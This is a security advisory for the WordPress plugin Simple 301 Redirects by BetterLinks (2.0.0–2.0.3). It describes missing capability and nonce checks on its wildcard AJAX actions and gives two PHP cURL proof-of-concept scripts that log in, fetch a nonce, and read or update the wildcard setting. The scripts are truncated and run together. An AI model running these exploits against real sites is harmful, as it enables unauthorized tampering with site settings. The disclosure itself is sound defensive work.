Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Update and Retrieve Wildcard Value

In the plugin, the lack of capability checks and insufficient nonce check on the AJAX actions, simple301redirects/admin/get_wildcard and simple301redirects/admin/wildcard, made it possible for authenticated users to retrieve and update the wildcard value for redirects.

PoC

$wp_user, ‘pwd’ => $wp_pass, ‘rememberme’ => ‘forever’, ‘wp-submit’ => ‘Log+In’, ]); $output = curl_exec($ch); curl_close($ch); echo ‘Getting REST API Nonce!’; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $siteurl . ‘/wp-admin/admin-ajax.php?action=rest-nonce’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); //Import Nonce preg_match(‘/([^"]+)/’, $content, $matches); $restnonce = $matches[1]; echo $restnonce; echo ‘wildcard!’; //Wildcard $ch = curl_init(); curl_setopt( $ch, CURLOPT_URL, $siteurl . ‘/wp-admin/admin-ajax.php’ ); curl_setopt( $ch, CURLOPT_USERAGENT, ‘Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13’ ); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true ); curl_setopt( $ch, CURLOPT_POST, true ); curl_setopt( $ch, CURLOPT_POSTFIELDS, [ ‘action’ => ‘simple301redirects/admin/wildcard’, ‘security’ => $restnonce, ‘toggle’ => ‘I have updated this setting!’, ] ); $output = curl_exec($ch); curl_close($ch); print($output) ?> $wp_user, ‘pwd’ => $wp_pass, ‘rememberme’ => ‘forever’, ‘wp-submit’ => ‘Log+In’, ]); $output = curl_exec($ch); curl_close($ch); echo ‘Getting REST API Nonce!’; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $siteurl . ‘/wp-admin/admin-ajax.php?action=rest-nonce’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); //Import Nonce preg_match(‘/([^"]+)/’, $content, $matches); $restnonce = $matches[1]; echo $restnonce; echo ‘Get wildcard!’; //Get wildcard $ch = curl_init(); curl_setopt( $ch, CURLOPT_URL, $siteurl . ‘/wp-admin/admin-ajax.php’ ); curl_setopt( $ch, CURLOPT_USERAGENT, ‘Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13’ ); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true ); curl_setopt( $ch, CURLOPT_POST, true ); curl_setopt( $ch, CURLOPT_POSTFIELDS, [ ‘action’ => ‘simple301redirects/admin/get_wildcard’, ‘security’ => $restnonce, ] ); $output = curl_exec($ch); curl_close($ch); print($output) ?>